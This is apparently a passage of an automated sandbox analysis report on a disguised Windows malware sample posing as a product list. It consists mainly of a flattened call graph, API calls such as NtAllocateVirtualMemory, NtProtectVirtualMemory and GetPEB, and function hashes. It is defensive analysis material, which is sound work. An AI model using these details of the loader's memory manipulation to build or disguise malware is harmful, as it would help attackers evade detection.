3072->3076 3073 40967b __vbaObjSet 3073->3076 3074 4096ba __vbaHresultCheckObj 3075 4096e4 __vbaStrMove 3074->3075 3075->3076 3076->3066 3076->3067 3076->3068 3076->3069 3076->3070 3076->3071 3076->3073 3076->3074 3076->3075 3077 409738 __vbaHresultCheckObj 3076->3077 3078 40975f __vbaFreeStr __vbaFreeObj __vbaVarAdd __vbaVarMove __vbaVarTstLt 3076->3078 3077->3078 3078->3076 3079 4097ec 3078->3079 3080->2990 3081->2990 3083 402d9d 3082->3083 3625 1d71752 3626 1d71b3f 2 API calls 3625->3626 3633 1d703ef 3626->3633 3627 1d71907 3628 1d717bd 2 API calls 3628->3633 3629 1d72bec GetPEB 3629->3633 3630 1d717e9 2 API calls 3630->3633 3631 1d738df 8 API calls 3631->3633 3632 1d7182a 2 API calls 3632->3633 3633->3627 3633->3628 3633->3629 3633->3630 3633->3631 3633->3632 3634 1d72614 3633->3634 3635 1d704ac 8 API calls 3633->3635 3636 1d70aa3 2 API calls 3634->3636 3635->3633 3637 1d72631 3636->3637 3103 407246 3104 407260 VirtualAlloc 3103->3104 3106 407790 3104->3106 3106->3106 3753 1d706de 3754 1d72eee 3753->3754 3756 1d7069e 3753->3756 3755 1d72d69 GetPEB 3754->3755 3757 1d72f01 3755->3757 3756->3754 3758 1d72bec GetPEB 3756->3758 3759 1d70741 3758->3759 3760 1d72bec GetPEB 3759->3760 3761 1d70764 3760->3761 3762 1d738df 8 API calls 3761->3762 3763 1d70789 3762->3763 3763->3754 3764 1d70796 3763->3764 3765 1d72ad5 GetPEB 3764->3765 3771 1d7079b 3765->3771 3766 1d707d3 3767 1d7086d 3766->3767 3769 1d70af3 2 API calls 3766->3769 3770 1d7088c 3767->3770 3772 1d70880 3767->3772 3776 1d70af3 2 API calls 3767->3776 3768 1d71301 8 API calls 3768->3771 3779 1d707e2 3769->3779 3774 1d70895 8 API calls 3770->3774 3771->3766 3771->3768 3775 1d707ba 3771->3775 3772->3770 3773 1d70bd0 8 API calls 3772->3773 3773->3770 3777 1d72b96 3774->3777 3775->3766 3778 1d718c5 3775->3778 3776->3772 3780 1d738df 8 API calls 3778->3780 3779->3767 3781 1d730ed 3 API calls 3779->3781 3780->3770 3782 1d70832 3781->3782 3783 1d709a1 8 API calls 3782->3783 3784 1d70843 3783->3784 3785 1d70c5e 8 API calls 3784->3785 3785->3767 3107 401a4c 3108 401a53 3107->3108 3111 41107c __vbaVarForNext 3108->3111 3110 401a7c 3112 41108c 3111->3112 3113 410fb4 9 API calls 3112->3113 3114 411099 __vbaVarAdd #650 __vbaVarMove __vbaFreeVarList 3112->3114 3113->3111 3115 41111f 7 API calls 3114->3115 3115->3110 3638 1d72347 3639 1d71b3f 2 API calls 3638->3639 3640 1d72351 3639->3640 3641 1d72bec GetPEB 3640->3641 3642 1d72365 3641->3642 3643 1d72bec GetPEB 3642->3643 3644 1d7237f 3643->3644 3117 1d707c4 3118 1d707d7 3117->3118 3119 1d7086d 3118->3119 3133 1d70af3 3118->3133 3121 1d7088c 3119->3121 3122 1d70880 3119->3122 3125 1d70af3 2 API calls 3119->3125 3210 1d70895 3121->3210 3122->3121 3202 1d70bd0 3122->3202 3125->3122 3126 1d707de 3126->3119 3139 1d730ed 3126->3139 3129 1d70832 3156 1d709a1 3129->3156 3134 1d72685 3133->3134 3214 1d70afd 3134->3214 3136 1d7268a 3219 1d70b19 3136->3219 3138 1d7267c 3138->3126 3140 1d72bec GetPEB 3139->3140 3141 1d730fc 3140->3141 3142 1d72bec GetPEB 3141->3142 3143 1d73116 GetPEB 3142->3143 3227 1d733e1 NtProtectVirtualMemory 3143->3227 3145 1d732ca 3145->3129 3146 1d73169 3146->3145 3147 1d732cf 3146->3147 3152 1d731f6 3146->3152 3150 1d73369 3147->3150 3151 1d73306 3147->3151 3149 1d733d7 3149->3129 3230 1d733e1 NtProtectVirtualMemory 3150->3230 3229 1d733e1 NtProtectVirtualMemory 3151->3229 3152->3152 3228 1d733e1 NtProtectVirtualMemory 3152->3228 3154 1d73364 3154->3129 3231 1d738df 3156->3231 3203 1d70be9 3202->3203 3357 1d70bf2 3203->3357 3211 1d708a7 3210->3211 3212 1d71d6e 8 API calls 3211->3212 3401 1d70d16 3211->3401 3212->3211 3222 1d71b3f 3214->3222 3216 1d70b08 3217 1d70b19 2 API calls 3216->3217 3218 1d7267c 3217->3218 3218->3136 3220 1d71b3f 2 API calls 3219->3220 3221 1d70b20 3220->3221 3221->3138 3223 1d71b55 3222->3223 3226 1d71c18 3222->3226 3224 1d72bec GetPEB 3223->3224 3225 1d71bb8 NtAllocateVirtualMemory 3224->3225 3225->3226 3226->3216 3227->3146 3228->3145 3229->3154 3230->3149 3233 1d738e4 3231->3233 3234 1d738ef 3233->3234 3234->3234 3255 1d73017 3234->3255 3238 1d73a1c 3239 1d703d8 3239->3238 3240 1d703ad 3239->3240 3241 1d703be 3240->3241 3242 1d703c9 3241->3242 3248 1d703ef 3241->3248 3243 1d703ad 8 API calls 3242->3243 3244 1d703dd 3243->3244 3245 1d738df 8 API calls 3245->3248 3246 1d72bec GetPEB 3246->3248 3248->3245 3248->3246 3252 1d72614 3248->3252 3258 1d704ac 3248->3258 3267 1d717bd 3248->3267 3270 1d717e9 3248->3270 3273 1d7182a 3248->3273 3276 1d70aa3 3252->3276 3256 1d72d69 GetPEB 3255->3256 3257 1d7302a 3256->3257 3257->3239 3259 1d71b3f 2 API calls 3258->3259 3260 1d704b6 3259->3260 3261 1d72bec GetPEB 3260->3261 3262 1d704cc 3261->3262 3263 1d72bec GetPEB 3262->3263 3264 1d704eb 3263->3264 3279 1d70511 3264->3279 3266 1d70504 3268 1d71b3f 2 API calls 3267->3268 3269 1d717c4 3268->3269 3269->3248 3271 1d71b3f 2 API calls 3270->3271 3272 1d717f0 3271->3272 3272->3248 3274 1d71b3f 2 API calls 3273->3274 3275 1d71831 3274->3275 3275->3248 3277 1d71b3f 2 API calls 3276->3277 3278 1d70aac 3277->3278 3280 1d71b3f 2 API calls 3279->3280 3283 1d70519 3280->3283 3282 1d705df 3286 1d72bec GetPEB 3282->3286 3284 1d72eee 3283->3284 3323 1d718e2 GetPEB 3283->3323 3285 1d72d69 GetPEB 3284->3285 3289 1d72f01 3285->3289 3287 1d705fd 3286->3287 3288 1d738df 8 API calls 3287->3288 3290 1d7061a 3288->3290 3289->3266 3291 1d72bec GetPEB 3290->3291 3302 1d7067f 3290->3302 3293 1d70639 3291->3293 3292 1d72bec GetPEB 3294 1d70741 3292->3294 3295 1d738df 8 API calls 3293->3295 3296 1d72bec GetPEB 3294->3296 3295->3302 3297 1d70764 3296->3297 3298 1d738df 8 API calls 3297->3298 3299 1d70789 3298->3299 3299->3284 3300 1d70796 3299->3300 3324 1d72ad5 3300->3324 3302->3284 3302->3292 3303 1d707d3 3304 1d7086d 3303->3304 3306 1d70af3 2 API calls 3303->3306 3307 1d7088c 3304->3307 3309 1d70880 3304->3309 3313 1d70af3 2 API calls 3304->3313 3316 1d707e2 3306->3316 3307->3266 3311 1d70895 8 API calls 3307->3311 3308 1d7079b 3308->3303 3312 1d707ba 3308->3312 3327 1d71301 3308->3327 3309->3307 3310 1d70bd0 8 API calls 3309->3310 3310->3307 3314 1d72b96 3311->3314 3312->3303 3315 1d718c5 3312->3315 3313->3309 3317 1d738df 8 API calls 3315->3317 3316->3304 3318 1d730ed 3 API calls 3316->3318 3317->3307 3319 1d70832 3318->3319 3320 1d709a1 8 API calls 3319->3320 3321 1d70843 3320->3321 3322 1d70c5e 8 API calls 3321->3322 3322->3304 3323->3282 3356 1d72b82 GetPEB 3324->3356 3326 1d72ada 3326->3308 3328 1d730ed 3 API calls 3327->3328 3329 1d7132a 3328->3329 3330 1d738df 8 API calls 3329->3330 3331 1d713ac 3330->3331 3332 1d716e3 3331->3332 3337 1d738df 8 API calls 3331->3337 3333 1d738df 8 API calls 3332->3333 3334 1d716fb 3333->3334 3335 1d738df 8 API calls 3334->3335 3336 1d7170e 3335->3336 3338 1d738df 8 API calls 3336->3338 3339 1d714bc 3337->3339 3340 1d71721 3338->3340 3339->3332 3342 1d738df 8 API calls 3339->3342 3341 1d738df 8 API calls 3340->3341 3344 1d71738 3341->3344 3343 1d71507 3342->3343 3343->3332 3345 1d738df 8 API calls 3343->3345 3344->3308 3346 1d71571 3345->3346 3346->3332 3346->3344 3347 1d738df 8 API calls 3346->3347 3348 1d7166e 3347->3348 3348->3332 3349 1d738df 8 API calls 3348->3349 3350 1d716a0 3349->3350 3350->3332 3351 1d716a7 3350->3351 3352 1d738df 8 API calls 3351->3352 3353 1d716bf 3352->3353 3353->3344 3354 1d738df 8 API calls 3353->3354 3355 1d716e2 3354->3355 3355->3308 3356->3326 3358 1d71b3f 2 API calls 3357->3358 3359 1d70bfc 3358->3359 3364 1d71d6e 3359->3364 3365 1d7240d 3364->3365 3368 1d71d73 3365->3368 3369 1d71b3f 2 API calls 3368->3369 3370 1d71d7a 3369->3370 3371 1d72bec GetPEB 3370->3371 3372 1d71d8f 3371->3372 3373 1d72bec GetPEB 3372->3373 3374 1d71daf 3373->3374 3375 1d72bec GetPEB 3374->3375 3376 1d71dc7 3375->3376 3377 1d72bec GetPEB 3376->3377 3378 1d71de1 3377->3378 3379 1d72bec GetPEB 3378->3379 3381 1d71dfb 3379->3381 3382 1d723c9 3381->3382 3383 1d71e23 3381->3383 3384 1d71b3f 2 API calls 3383->3384 3385 1d71e2a 3384->3385 3386 1d71fe9 3385->3386 3387 1d738df 8 API calls 3385->3387 3388 1d738df 8 API calls 3386->3388 3391 1d71e7d 3387->3391 3389 1d71ffc 3388->3389 3389->3381 3390 1d738df 8 API calls 3390->3391 3391->3386 3391->3390 3392 1d71f73 3391->3392 3394 1d703d8 3391->3394 3393 1d738df 8 API calls 3392->3393 3396 1d71f8a 3393->3396 3395 1d703ad 8 API calls 3394->3395 3397 1d703dd 3395->3397 3396->3394 3398 1d71fa2 3396->3398 3397->3381 3399 1d738df 8 API calls 3398->3399 3400 1d71fb4 3399->3400 3400->3381 3402 1d72bec GetPEB 3401->3402 3409 1d70d23 3402->3409 3403 1d71301 3404 1d730ed 3 API calls 3403->3404 3405 1d7132a 3404->3405 3406 1d738df 7 API calls 3405->3406 3410 1d713ac 3406->3410 3407 1d716e3 3408 1d738df 7 API calls 3407->3408 3411 1d716fb 3408->3411 3409->3403 3412 1d738df 7 API calls 3409->3412 3431 1d70e74 3409->3431 3410->3407 3415 1d738df 7 API calls 3410->3415 3413 1d738df 7 API calls 3411->3413 3412->3409 3414 1d7170e 3413->3414 3416 1d738df 7 API calls 3414->3416 3417 1d714bc 3415->3417 3418 1d71721 3416->3418 3417->3407 3420 1d738df 7 API calls 3417->3420 3419 1d738df 7 API calls 3418->3419 3422 1d71738 3419->3422 3421 1d71507 3420->3421 3421->3407 3423 1d738df 7 API calls 3421->3423 3422->3211 3428 1d71571 3423->3428 3424 1d71010 3425 1d71017 GetPEB 3424->3425 3427 1d7103c 3425->3427 3426 1d710ff 3444 1d7111a 3426->3444 3427->3426 3430 1d738df 7 API calls 3427->3430 3432 1d710cc 3427->3432 3428->3407 3428->3422 3434 1d738df 7 API calls 3428->3434 3430->3427 3431->3403 3431->3424 3433 1d738df 7 API calls 3432->3433 3433->3426 3436 1d7166e 3434->3436 3436->3407 3437 1d738df 7 API calls 3436->3437 3438 1d716a0 3437->3438 3438->3407 3439 1d716a7 3438->3439 3440 1d738df 7 API calls 3439->3440 3441 1d716bf 3440->3441 3441->3422 3442 1d738df 7 API calls 3441->3442 3443 1d716e2 3442->3443 3443->3211 3445 1d7112c 3444->3445 3445->3445 3446 1d71136 GetPEB 3445->3446 3447 1d738df 7 API calls 3446->3447 3448 1d7117b 3447->3448 3449 1d738df 7 API calls 3448->3449 3451 1d71102 3448->3451 3449->3451 3450 1d7111a 7 API calls 3452 1d73a66 3450->3452 3451->3450 3451->3452 3786 1d718c3 3787 1d718c5 3786->3787 3788 1d738df 8 API calls 3787->3788 3789 1d718db 3788->3789 3790 1d70895 8 API calls 3789->3790 3791 1d72b96 3790->3791 3453 1d707c1 3454 1d707d3 3453->3454 3455 1d7086d 3454->3455 3456 1d70af3 2 API calls 3454->3456 3457 1d7088c 3455->3457 3458 1d70880 3455->3458 3461 1d70af3 2 API calls 3455->3461 3463 1d707e2 3456->3463 3460 1d70895 8 API calls 3457->3460 3458->3457 3459 1d70bd0 8 API calls 3458->3459 3459->3457 3462 1d72b96 3460->3462 3461->3458 3463->3455 3464 1d730ed 3 API calls 3463->3464 3465 1d70832 3464->3465 3466 1d709a1 8 API calls 3465->3466 3467 1d70843 3466->3467 3468 1d70c5e 8 API calls 3467->3468 3468->3455 3843 1d73a4d 3844 1d73a60 3843->3844 3845 1d703d8 3843->3845 3847 1d7111a 8 API calls 3844->3847 3846 1d703ad 8 API calls 3845->3846 3848 1d703dd 3846->3848 3849 1d73a66 3847->3849 3469 1d723f6 3470 1d7240d 3469->3470 3471 1d71d73 8 API calls 3470->3471 3472 1d72412 3471->3472 3792 1d718f4 3793 1d71904 3792->3793 3794 1d72d69 GetPEB 3793->3794 3797 1d72c28 3793->3797 3795 1d72c06 3794->3795 3796 1d72d69 GetPEB 3795->3796 3795->3797 3798 1d72c17 3796->3798 3798->3797 3799 1d72d69 GetPEB 3798->3799 3799->3797 3800 401b65 3801 401b6c __vbaNew2 3800->3801 3803 4109a6 __vbaObjSet 3801->3803 3805 4109e4 3803->3805 3806 410a15 3805->3806 3807 4109f5 __vbaHresultCheckObj 3805->3807 3808 410a40 3806->3808 3809 410a25 __vbaNew2 3806->3809 3807->3806 3810 410a4a __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk 3808->3810 3809->3810 3811 410b26 3810->3811 3812 410b57 3811->3812 3813 410b37 __vbaHresultCheckObj 3811->3813 3814 410b5e __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVarList 3812->3814 3813->3814 3815 410bb0 __vbaFreeStr __vbaFreeStr __vbaFreeObj 3814->3815 3657 1d71f70 3658 1d71f73 3657->3658 3659 1d738df 8 API calls 3658->3659 3660 1d71f8a 3659->3660 3661 1d71fa2 3660->3661 3662 1d703d8 3660->3662 3664 1d738df 8 API calls 3661->3664 3663 1d703ad 8 API calls 3662->3663 3666 1d703dd 3663->3666 3665 1d71fb4 3664->3665 2949 4013f0 #100 2950 40141a 2949->2950 3084 1d733e1 NtProtectVirtualMemory 3671 1d7256f 3680 1d703ef 3671->3680 3672 1d72bec GetPEB 3672->3680 3673 1d717bd 2 API calls 3673->3680 3674 1d717e9 2 API calls 3674->3680 3675 1d738df 8 API calls 3675->3680 3676 1d7182a 2 API calls 3676->3680 3677 1d72614 3679 1d70aa3 2 API calls 3677->3679 3678 1d704ac 8 API calls 3678->3680 3681 1d72631 3679->3681 3680->3672 3680->3673 3680->3674 3680->3675 3680->3676 3680->3677 3680->3678 3473 1d72de8 3474 1d72bec GetPEB 3473->3474 3476 1d72e04 3474->3476 3475 1d738df 8 API calls 3475->3476 3476->3475 3477 1d72eec 3476->3477 3479 1d72f01 3476->3479 3478 1d72d69 GetPEB 3477->3478 3478->3479 3817 1d71a94 3818 1d71b3f 2 API calls 3817->3818 3819 1d71a9b 3818->3819 3820 1d72d69 GetPEB 3819->3820 3821 1d72f01 3820->3821 3480 407206 3481 407214 VirtualAlloc 3480->3481 3483 407790 3481->3483 3822 1d72e90 3824 1d72e21 3822->3824 3823 1d738df 8 API calls 3823->3824 3824->3823 3825 1d72eec 3824->3825 3827 1d72f01 3824->3827 3826 1d72d69 GetPEB 3825->3826 3826->3827 3484 410e09 __vbaChkstk 3485 410e49 #536 __vbaStrMove __vbaFreeVar 3484->3485 3486 410e8c __vbaFreeStr 3485->3486 3487 1d70f9e 3490 1d70f0f 3487->3490 3488 1d71301 3489 1d730ed 3 API calls 3488->3489 3491 1d7132a 3489->3491 3490->3488 3492 1d71010 3490->3492 3493 1d738df 8 API calls 3491->3493 3495 1d71017 GetPEB 3492->3495 3497 1d713ac 3493->3497 3494 1d716e3 3496 1d738df 8 API calls 3494->3496 3500 1d7103c 3495->3500 3498 1d716fb 3496->3498 3497->3494 3504 1d738df 8 API calls 3497->3504 3499 1d738df 8 API calls 3498->3499 3502 1d7170e 3499->3502 3501 1d710ff 3500->3501 3506 1d738df 8 API calls 3500->3506 3510 1d710cc 3500->3510 3503 1d7111a 8 API calls 3501->3503 3505 1d738df 8 API calls 3502->3505 3516 1d73a66 3503->3516 3507 1d714bc 3504->3507 3508 1d71721 3505->3508 3506->3500 3507->3494 3511 1d738df 8 API calls 3507->3511 3509 1d738df 8 API calls 3508->3509 3514 1d71738 3509->3514 3512 1d738df 8 API calls 3510->3512 3513 1d71507 3511->3513 3512->3501 3513->3494 3515 1d738df 8 API calls 3513->3515 3517 1d71571 3515->3517 3517->3494 3517->3514 3518 1d738df 8 API calls 3517->3518 3519 1d7166e 3518->3519 3519->3494 3520 1d738df 8 API calls 3519->3520 3521 1d716a0 3520->3521 3521->3494 3522 1d716a7 3521->3522 3523 1d738df 8 API calls 3522->3523 3524 1d716bf 3523->3524 3524->3514 3525 1d738df 8 API calls 3524->3525 3526 1d716e2 3525->3526 3527 401c0f 3528 401c21 3527->3528 3531 41040f __vbaFreeStrList __vbaFreeObjList __vbaFreeVarList __vbaAryDestruct 3528->3531 3530 401c28 3531->3530 3532 1d71998 3533 1d7199e 3532->3533 3535 1d71a03 3533->3535 3536 1d71a06 3533->3536 3538 1d71a0b 3536->3538 3537 1d72d69 GetPEB 3539 1d72f01 3537->3539 3538->3533 3538->3536 3538->3537 3539->3533 3540 1d71798 3541 1d71b3f 2 API calls 3540->3541 3551 1d703ef 3541->3551 3542 1d717bd 2 API calls 3542->3551 3543 1d717e9 2 API calls 3543->3551 3544 1d7182a 2 API calls 3544->3551 3545 1d72614 3546 1d70aa3 2 API calls 3545->3546 3547 1d72631 3546->3547 3548 1d738df 8 API calls 3548->3551 3549 1d72bec GetPEB 3549->3551 3550 1d704ac 8 API calls 3550->3551 3551->3542 3551->3543 3551->3544 3551->3545 3551->3548 3551->3549 3551->3550 3828 1d70898 3830 1d708d2 3828->3830 3829 1d71d6e 8 API calls 3829->3830 3830->3829 3831 1d70d16 8 API calls 3830->3831 3831->3830 3552 1d70384 3553 1d71b3f 2 API calls 3552->3553 3554 1d7038b 3553->3554 3555 1d703a9 3554->3555 3556 1d72bec GetPEB 3554->3556 3557 1d703ad 8 API calls 3555->3557 3556->3555 3558 1d703dd 3557->3558 3894 1d70000 3895 1d700f5 3894->3895 3896 1d70127 3895->3896 3897 1d71301 3895->3897 3927 1d70151 3896->3927 3899 1d730ed 3 API calls 3897->3899 3900 1d7132a 3899->3900 3901 1d738df 8 API calls 3900->3901 3904 1d713ac 3901->3904 3902 1d716e3 3903 1d738df 8 API calls 3902->3903 3905 1d716fb 3903->3905 3904->3902 3908 1d738df 8 API calls 3904->3908 3906 1d738df 8 API calls 3905->3906 3907 1d7170e 3906->3907 3909 1d738df 8 API calls 3907->3909 3910 1d714bc 3908->3910 3911 1d71721 3909->3911 3910->3902 3913 1d738df 8 API calls 3910->3913 3912 1d738df 8 API calls 3911->3912 3915 1d71738 3912->3915 3914 1d71507 3913->3914 3914->3902 3916 1d738df 8 API calls 3914->3916 3917 1d71571 3916->3917 3917->3902 3917->3915 3918 1d738df 8 API calls 3917->3918 3919 1d7166e 3918->3919 3919->3902 3920 1d738df 8 API calls 3919->3920 3921 1d716a0 3920->3921 3921->3902 3922 1d716a7 3921->3922 3923 1d738df 8 API calls 3922->3923 3924 1d716bf 3923->3924 3924->3915 3925 1d738df 8 API calls 3924->3925 3926 1d716e2 3925->3926 3929 1d70161 3927->3929 3928 1d703ad 8 API calls 3930 1d703dd 3928->3930 3929->3928 3931 1d72421 3929->3931 3559 410619 __vbaChkstk 3560 41065b 7 API calls 3559->3560 3561 410bb0 __vbaFreeStr __vbaFreeStr __vbaFreeObj 3560->3561 3562 4106cc 3560->3562 3564 4106f0 3562->3564 3565 4106d5 __vbaNew2 3562->3565 3566 41074e 3564->3566 3567 41072e __vbaHresultCheckObj 3564->3567 3565->3564 3568 410787 __vbaHresultCheckObj 3566->3568 3569 4107aa 3566->3569 3567->3566 3570 4107b1 __vbaStrMove __vbaFreeObj 3568->3570 3569->3570 3571 4107f8 __vbaObjSet 3570->3571 3572 4107dd __vbaNew2 3570->3572 3574 410840 3571->3574 3572->3571 3575 410871 3574->3575 3576 410851 __vbaHresultCheckObj 3574->3576 3577 410881 __vbaNew2 3575->3577 3578 41089c 3575->3578 3576->3575 3577->3578 3579 4108fa 3578->3579 3580 4108da __vbaHresultCheckObj 3578->3580 3581 410934 __vbaHresultCheckObj 3579->3581 3582 410957 3579->3582 3580->3579 3583 41095e __vbaFreeStr __vbaFreeObjList 3581->3583 3582->3583 3584 410981 __vbaNew2 3583->3584 3585 41099c __vbaObjSet 3583->3585 3584->3585 3587 4109e4 3585->3587 3588 410a15 3587->3588 3589 4109f5 __vbaHresultCheckObj 3587->3589 3590 410a40 3588->3590 3591 410a25 __vbaNew2 3588->3591 3589->3588 3592 410a4a __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk 3590->3592 3591->3592 3593 410b26 3592->3593 3594 410b57 3593->3594 3595 410b37 __vbaHresultCheckObj 3593->3595 3596 410b5e __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVarList 3594->3596 3595->3596 3596->3561 3689 1d7050e 3690 1d71b3f 2 API calls 3689->3690 3693 1d70519 3689->3693 3690->3693 3692 1d705df 3696 1d72bec GetPEB 3692->3696 3694 1d72eee 3693->3694 3733 1d718e2 GetPEB 3693->3733 3695 1d72d69 GetPEB 3694->3695 3699 1d72f01 3695->3699 3697 1d705fd 3696->3697 3698 1d738df 8 API calls 3697->3698 3700 1d7061a 3698->3700 3701 1d72bec GetPEB 3700->3701 3711 1d7067f 3700->3711 3703 1d70639 3701->3703 3702 1d72bec GetPEB 3704 1d70741 3702->3704 3705 1d738df 8 API calls 3703->3705 3706 1d72bec GetPEB 3704->3706 3705->3711 3707 1d70764 3706->3707 3708 1d738df 8 API calls 3707->3708 3709 1d70789 3708->3709 3709->3694 3710 1d70796 3709->3710 3712 1d72ad5 GetPEB 3710->3712 3711->3694 3711->3702 3716 1d7079b 3712->3716 3713 1d707d3 3715 1d70af3 2 API calls 3713->3715 3717 1d7086d 3713->3717 3714 1d71301 8 API calls 3714->3716 3726 1d707e2 3715->3726 3716->3713 3716->3714 3720 1d707ba 3716->3720 3721 1d70af3 2 API calls 3717->3721 3724 1d70880 3717->3724 3727 1d7088c 3717->3727 3718 1d70bd0 8 API calls 3718->3727 3719 1d70895 8 API calls 3722 1d72b96 3719->3722 3720->3713 3723 1d718c5 3720->3723 3721->3724 3725 1d738df 8 API calls 3723->3725 3724->3718 3724->3727 3725->3727 3726->3717 3728 1d730ed 3 API calls 3726->3728 3727->3719 3729 1d70832 3728->3729 3730 1d709a1 8 API calls 3729->3730 3731 1d70843 3730->3731 3732 1d70c5e 8 API calls 3731->3732 3732->3717 3733->3692 3932 1d71037 3934 1d7103c 3932->3934 3933 1d710ff 3935 1d7111a 8 API calls 3933->3935 3934->3933 3936 1d738df 8 API calls 3934->3936 3937 1d710cc 3934->3937 3939 1d73a66 3935->3939 3936->3934 3938 1d738df 8 API calls 3937->3938 3938->3933 3085 407726 3086 407741 VirtualAlloc 3085->3086 3087 407790 3086->3087 3088 1d71b3f 3089 1d71b55 3088->3089 3092 1d71c18 3088->3092 3093 1d72bec 3089->3093 3091 1d71bb8 NtAllocateVirtualMemory 3091->3092 3094 1d72bfa 3093->3094 3097 1d72c28 3093->3097 3101 1d72d69 GetPEB 3094->3101 3096 1d72c06 3096->3097 3098 1d72d69 GetPEB 3096->3098 3097->3091 3099 1d72c17 3098->3099 3099->3097 3100 1d72d69 GetPEB 3099->3100 3100->3097 3102 1d72d7b 3101->3102 3102->3096 3940 1d73238 3941 1d73212 3940->3941 3944 1d733e1 NtProtectVirtualMemory 3941->3944 3943 1d732ca 3944->3943 3609 410c35 __vbaChkstk __vbaStrCopy 3610 410c76 __vbaNew2 3609->3610 3611 410c8e 3609->3611 3610->3611 3612 410cb7 __vbaHresultCheckObj 3611->3612 3613 410cce 3611->3613 3612->3613 3614 410cf5 __vbaHresultCheckObj 3613->3614 3615 410d0f 3613->3615 3616 410d13 __vbaStrMove __vbaFreeObj 3614->3616 3615->3616 3617 410d51 __vbaObjSet 3616->3617 3618 410d39 __vbaNew2 3616->3618 3620 410d8a 3617->3620 3618->3617 3621 410d95 __vbaHresultCheckObj 3620->3621 3622 410daf 3620->3622 3623 410db3 __vbaFreeObj 3621->3623 3622->3623 3624 410ddb __vbaFreeStr __vbaFreeStr 3623->3624 3836 1d718ac 3837 1d71b3f 2 API calls 3836->3837 3838 1d718b6 3837->3838 3738 410ebc __vbaChkstk 3739 410efe __vbaVarCopy __vbaVarTstEq 3738->3739 3740 410f33 __vbaVarTstEq 3739->3740 3741 410f23 __vbaVarCopy 3739->3741 3742 41111f 7 API calls 3740->3742 3743 410f4e __vbaLenVar __vbaVarForInit 3740->3743 3741->3742 3745 41108c 3743->3745 3746 410fb4 9 API calls 3745->3746 3747 411099 __vbaVarAdd #650 __vbaVarMove __vbaFreeVarList 3745->3747 3748 41107c __vbaVarForNext 3746->3748 3747->3742 3748->3745

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 203 1d71b3f-1d71b4f 204 1d71b55-1d71c12 call 1d72bec NtAllocateVirtualMemory 203->204 205 1d71c18-1d71cac call 1d72b5a call 1d71c5a 203->205 204->205
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000), ref: 01D71BF4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID: fel
                  • API String ID: 2167126740-998966389
                  • Opcode ID: 9a3c85134a3d365950eb5d71adbce10e784b8a870bffcdea00dba4eba8e0cf75
                  • Instruction ID: 77e33c544734b3206097bdff7907b2cae3fa223fb798222c9ff5b2419f46ce53
                  • Opcode Fuzzy Hash: 9a3c85134a3d365950eb5d71adbce10e784b8a870bffcdea00dba4eba8e0cf75
                  • Instruction Fuzzy Hash: D22138B15007899FEB315F38CC51BDF76A2EF45354F10822CEE899F2A4D7748A808B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 213 407206-407212 214 407260-4073bc 213->214 215 407214-407245 213->215 220 4073c2-40744c 214->220 215->214 223 407452-4077dd VirtualAlloc 220->223 235 4077e3-407898 call 40791e 223->235 240 40789e-4078f9 235->240 243 4078fc 240->243 243->243
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID: ]
                  • API String ID: 0-1813045944
                  • Opcode ID: 0ed6bdb513bd94b69ad78142c241a7ca4e1d67942e1e0807a5d8e35ee95db196
                  • Instruction ID: 0654c5c579814525cd69a9c404a01ecbc6dc6d6fb0272bf24d6b79db9abba7be
                  • Opcode Fuzzy Hash: 0ed6bdb513bd94b69ad78142c241a7ca4e1d67942e1e0807a5d8e35ee95db196
                  • Instruction Fuzzy Hash: CA813562F18B1185FF352128C9E056C6502DBD2344F32873BCD6A33DC55B3E16C6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 244 407246-4073bc 250 4073c2-40744c 244->250 253 407452-4077dd VirtualAlloc 250->253 265 4077e3-407898 call 40791e 253->265 270 40789e-4078f9 265->270 273 4078fc 270->273 273->273
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID: ]
                  • API String ID: 4275171209-1813045944
                  • Opcode ID: 2107def32f4d190f21624457edce8cc9f0d855102c199a55899f6ea0447b6c5b
                  • Instruction ID: 37cc49b4028cb5ee1b2d669398556f8c8fdcfddf01ea1d6de6b56072586c2096
                  • Opcode Fuzzy Hash: 2107def32f4d190f21624457edce8cc9f0d855102c199a55899f6ea0447b6c5b
                  • Instruction Fuzzy Hash: 8F811462F18B5185FF362128C9E056D6502EF96340F32873BCD6A33DC55B3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
